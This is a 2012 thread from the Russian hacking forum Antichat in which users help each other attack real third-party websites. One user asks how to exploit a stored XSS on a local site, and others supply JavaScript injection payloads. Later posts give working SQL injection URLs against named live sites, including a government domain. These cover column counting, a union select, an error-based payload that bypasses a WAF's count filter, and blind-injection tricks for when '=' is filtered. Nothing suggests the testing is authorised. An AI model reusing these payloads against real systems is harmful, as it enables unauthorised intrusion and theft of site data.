ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.02.2012, 20:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Нашел активную xss в самописном движке одного локального сайта.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
...........
var[/COLOR][COLOR="#0000BB"]UNBS[/COLOR][COLOR="#007700"]={[/COLOR][COLOR="#0000BB"]221122[/COLOR][COLOR="#007700"]:{[/COLOR][COLOR="#0000BB"]md[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"0"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]nk[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"injs"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sex[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"m"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pic[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"01.gif"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]rc[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]flg[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]hp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]101[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]y[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]lnm[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"111"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]rnm[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"111"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]lpc[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"2222"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]rpc[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"222"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]inj[/COLOR][COLOR="#007700"]:[[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]rt[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]156.971428571429[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tn[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ah[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ab[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]al[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ar[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]af[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]}};
.........
function[/COLOR][COLOR="#0000BB"]start[/COLOR][COLOR="#007700"]()
{
[/COLOR][COLOR="#0000BB"]Redraw[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]AddData[/COLOR][COLOR="#007700"]([{[/COLOR][COLOR="#0000BB"]act[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]INJECT[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]nmb[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]},{[/COLOR][COLOR="#0000BB"]tm[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"16:16"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]act[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]chng[/COLOR][COLOR="#007700"]:[{[/COLOR][COLOR="#0000BB"]unb[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]202636351[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]y[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tn[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]}]}{[/COLOR][COLOR="#0000BB"]tm[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]"16:19"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]act[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]chng[/COLOR][COLOR="#007700"]:[{[/COLOR][COLOR="#0000BB"]unb[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]202636351[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]y[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tn[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]}]}],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]ReloadReq[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]setTimeout[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"correctTimer()"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1000[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR]
в [INJECT] могу вставить любой код.
можно ли средствами js поменять значения первой части скрипта(между точками) с rnm:"111"(например) на rnm:"222"? |
|
|
|
19.02.2012, 20:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
В зависимости от того, что делает функция AddData, инъектировать можно, например, }],1);UNBS[221122].rnm='something';//
|
|
|
|
19.02.2012, 20:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от SecondLife
SecondLife said:
В зависимости от того, что делает функция
AddData
, инъектировать можно, например,
}],1);alert(/xss/);//
мне нельзя прерывать тот код. да вставить алерты как раз плюнуть. мне интересно, можно ли обратиться к коду выше, изменить одну переменную не прерывая adddata. так как я adddata - динамично изменяется и строк так 50 занимает)
|
|
|
|
19.02.2012, 21:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
Функция AddData будет выполнена, ее вызов мы отменить не можем. Можем только косвенно влиять на результат ее работы, манипулируя передваваемым объектом.
Я подправил предыдущий пост, там вместо алерта присвоение идет.
Впринципе, можно это присвоение сделать и иначе:
Код:
Code:
,tmp:UNBS[221122].rnm='something'
|
|
|
|
19.02.2012, 21:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
7749
Репутация:
0
|
|
Столкнулся с очередным инжектом в MSSQL.При подборе через order by мне выдало 12 полей.ок.Делаю union (без all) по 12 null-полям,ошибка.Решил проверить,что на это скажет панголин - он отослал запрос union all select + 13 null-ов.Работает.Теперь вопрос,почему не работает у меня...
ЗЫ: Возможности глянуть сам запрос нет.
|
|
|
|
19.02.2012, 22:43
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
4954
Репутация:
0
|
|
Сообщение от SecondLife
SecondLife said:
http://www.dob.ee/listings.php?category=-333)+order+by+1%23
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...
|
|
|
20.02.2012, 02:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
Сообщение от Qwert321
Qwert321 said:
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...
вообщем там WAF, и два запроса к базе:
1. http://www.dob.ee/listings.php?category=399)+order+by+2%23 - false, true
2.http://www.dob.ee/listings.php?category=399)+order+by+89%23 - false, false (в моей практике впервые столько колонок (88))
+ еще фильтрация union, и =, походу но может и еще на что то, можно пробывать так но чет не пляшет нифига:
Код:
Code:
http://www.dob.ee/listings.php?category=333)+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88%23
походу просто нет принтабельных полей а это значит - blind,
но как раскрутить слепую с фильтром знака "=" я незнаю((
|
|
|
|
20.02.2012, 02:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Qwert321
Qwert321 said:
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...
http://www.dob.ee/listings.php
?category=3)and(select+1+from(select+/*!count(*)*/,concat((select+schema_name+from+information_schem a.schemata+limit+1,1),floor(Rand(0)*2))a+from+info rmation_schema.tables+group+by+a)b)%23
Cтоит фильтр на count, обходится как у меня в линке.
Upd:
Сообщение от pirat0
pirat0 said:
походу просто нет принтабельных полей а это значит - blind,
но как раскрутить слепую с фильтром знака "=" я незнаю((
так же как и обычно. Только правильностью будет false
50 <> 50 = false. То что надо.
|
|
|
|
20.02.2012, 02:36
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
4954
Репутация:
0
|
|
Сообщение от pirat0
pirat0 said:
вообщем там WAF, и два запроса к базе
спасибо...
Сообщение от Melfis
Melfis said:
Cтоит фильтр на count, обходится как у меня в линке.
спасибо всем ...разобрался...
|
|
|
|
20.02.2012, 19:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Код:
Code:
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0)+--+
I tried most injections but do not work on it. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
